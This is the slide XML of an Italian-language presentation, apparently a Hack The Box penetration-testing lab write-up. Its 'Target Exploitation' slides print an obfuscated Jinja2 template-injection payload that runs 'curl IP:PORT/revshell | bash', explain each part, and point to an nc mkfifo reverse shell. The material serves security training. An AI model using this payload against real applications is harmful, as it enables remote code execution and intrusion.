        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369394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2" name="Group 6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3" name="Straight Connector 6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088653" y="725951"/>
            <a:ext cx="4927425" cy="1938525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55" descr="A toy rocket flying out of the computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7362B885-003F-6176-B926-6CCAF933DDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35133" r="7963" b="-3"/>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95" name="Right Triangle 9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088653" y="2886116"/>
            <a:ext cx="4927425" cy="3245931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Payload:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>{{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request|attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("\x5f\x5fglobals\x5f\x5f")|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> IP:PORT/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>revshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")()}}</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" i="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385227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2FD1FEA2-AFB3-4160-AD46-30A807296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0" name="Group 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{514AF8D4-8E5C-4E3A-999F-1FE86654EE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1" name="Straight Connector 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8BE230-DCEC-4180-B5D3-EA65C4A343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034248-80AA-4C75-A898-0CBAF23E7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7431FC-0100-44D0-999E-3EF9B361E1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71491DF-0796-4A80-B724-6CAAD85E57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C3FFC75-C94A-4427-85D1-26F0028AC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0F1554D-792C-4554-B623-F99A47B1B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371075-9273-4FF4-A45B-606B94306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44A38F-298C-477B-8764-0A32E50DD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78CA47-3A09-4651-B57D-690F14C783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CB69771-B806-4E29-834E-E0BBE273B8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7EE3C0-1B82-43F3-AF55-5D1D6FBF47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898DA7-BA6E-4B4C-8139-596D59F482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121E84-2FAA-4948-B3B3-F1FE69ED87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1C2C1AC-3864-47AA-B22A-D350A3A04E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DFADCA4-3AD3-4D6C-81B7-259F203594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6D515CD-A4F0-4B0A-B6BB-11A2774F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B97DD1-8D17-426C-BC2A-B34FE5836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5865967-B063-41EC-85BC-A5CF90367E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BC63DB2-5B99-42B5-9B7F-826B0BD876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6B694AB-9FC1-4857-A6CD-1FEC6D183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2AE103-97D9-407D-BCE0-9FA475661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30AC9FC-9BF1-4F78-B0F9-4E024D0C6D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77E885-6F2C-4E94-88DF-7E6BEF98AC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62840B5-21D6-4B05-802E-549F1A92A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21055F-E4D5-474F-B6C7-C44BC1244B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49B031-FD8F-422C-AA54-9FB482600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F843B0-2A4F-4989-8B91-BDB7FECE7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BC5B75-FAF9-427D-BD65-D37C1BF973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0BFA052-2C6E-4F70-BF95-50DAC0649E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DD7C7F8-6562-470D-B38E-21F56B2AB2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C7B2A1-F80D-4F4A-88E1-5FFB02B70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10325000" cy="1387118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Right Triangle 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA2BC59-928B-43C3-B9E7-D77D4F3E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5947" y="151620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1202548" y="2340129"/>
            <a:ext cx="8817702" cy="3836833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Questo codice utilizza una tecnica avanzata per eseguire del codice arbitrario all'interno di un'applicazione Python. Vediamo nel dettaglio cosa fa ogni parte del codice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>{{ ... }}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Questa è una sintassi utilizzata nei template engines come Jinja2 per eseguire codice Python all'interno di template HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request|attr("application")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Ottiene l'attributo application dall'oggetto request. Questo di solito si riferisce all'applicazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WSGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in esecuzione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr("__globals__")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Ottiene l'attributo __globals__ dell'oggetto application. Questo fornisce accesso agli oggetti globali dell'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr("__getitem__")("__builtins__")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Ottiene l'elemento __builtins__ dal dizionario globale. __builtins__ contiene tutti i built-in di Python come funzioni e moduli di base.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr("__getitem__")("__import__")("os"):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Utilizza la funzione __import__ per importare il modulo os.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr("popen")("curl IP:PORT/revshell | bash")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Usa popen del modulo os per eseguire il comando shell curl IP:PORT/revshell | bash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attr("read")()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Legge il risultato dell'esecuzione del comando shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1317463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2"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3"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pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La parte in cui c’è scritto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> IP:PORT/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>revshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” dovrà essere sostituita con un apposito comando che ci permetterà di ottenere la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ReverseShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sul sito web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.revshells.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> nella sezione “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mkfifo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” c’è proprio quello che fa per noi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>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EE004B2C-7668-73B1-AE31-6189F494871F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1683979"/>
            <a:ext cx="6401443" cy="3504789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1844334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0" name="Group 59">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1" name="Straight Connector 60">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3" name="Right Triangle 92">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pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ora dobbiamo inserire tale comando all’interno del payload e codificarlo. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Una volta codificato il payload avremo il seguente risultato: </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2233E4CD-A086-D264-2596-79B4817D1A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1067840"/>
            <a:ext cx="6401443" cy="4737068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78958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D1FEA2-AFB3-4160-AD46-30A807296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514AF8D4-8E5C-4E3A-999F-1FE86654EE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AA8BE230-DCEC-4180-B5D3-EA65C4A343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034248-80AA-4C75-A898-0CBAF23E7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7431FC-0100-44D0-999E-3EF9B361E1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71491DF-0796-4A80-B724-6CAAD85E57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3FFC75-C94A-4427-85D1-26F0028AC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F1554D-792C-4554-B623-F99A47B1B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371075-9273-4FF4-A45B-606B94306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44A38F-298C-477B-8764-0A32E50DD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78CA47-3A09-4651-B57D-690F14C783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B69771-B806-4E29-834E-E0BBE273B8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7EE3C0-1B82-43F3-AF55-5D1D6FBF47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898DA7-BA6E-4B4C-8139-596D59F482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121E84-2FAA-4948-B3B3-F1FE69ED87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C2C1AC-3864-47AA-B22A-D350A3A04E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FADCA4-3AD3-4D6C-81B7-259F203594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D515CD-A4F0-4B0A-B6BB-11A2774F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B97DD1-8D17-426C-BC2A-B34FE5836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865967-B063-41EC-85BC-A5CF90367E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C63DB2-5B99-42B5-9B7F-826B0BD876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B694AB-9FC1-4857-A6CD-1FEC6D183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2AE103-97D9-407D-BCE0-9FA475661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30AC9FC-9BF1-4F78-B0F9-4E024D0C6D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77E885-6F2C-4E94-88DF-7E6BEF98AC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2840B5-21D6-4B05-802E-549F1A92A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21055F-E4D5-474F-B6C7-C44BC1244B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49B031-FD8F-422C-AA54-9FB482600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F843B0-2A4F-4989-8B91-BDB7FECE7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0BC5B75-FAF9-427D-BD65-D37C1BF973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BFA052-2C6E-4F70-BF95-50DAC0649E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D7C7F8-6562-470D-B38E-21F56B2AB2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6C7B2A1-F80D-4F4A-88E1-5FFB02B70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B420F81D-6218-BED2-F848-83D216B10416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725952"/>
            <a:ext cx="10325000" cy="1387118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Informazioni preliminari</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Right Triangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA2BC59-928B-43C3-B9E7-D77D4F3E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5947" y="151620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egnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBAEF028-A831-3FE9-E7A8-B2333CE9D9BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202548" y="2340129"/>
            <a:ext cx="8817702" cy="3836833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per collegarsi è stato necessario scaricare la VPN che si trova sul sito di Hack The Box che ci permette di vedere nella rete loca l’istanza della macchina che vogliamo analizzare con il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1900" dirty="0">
                <a:ea typeface="+mn-lt"/>
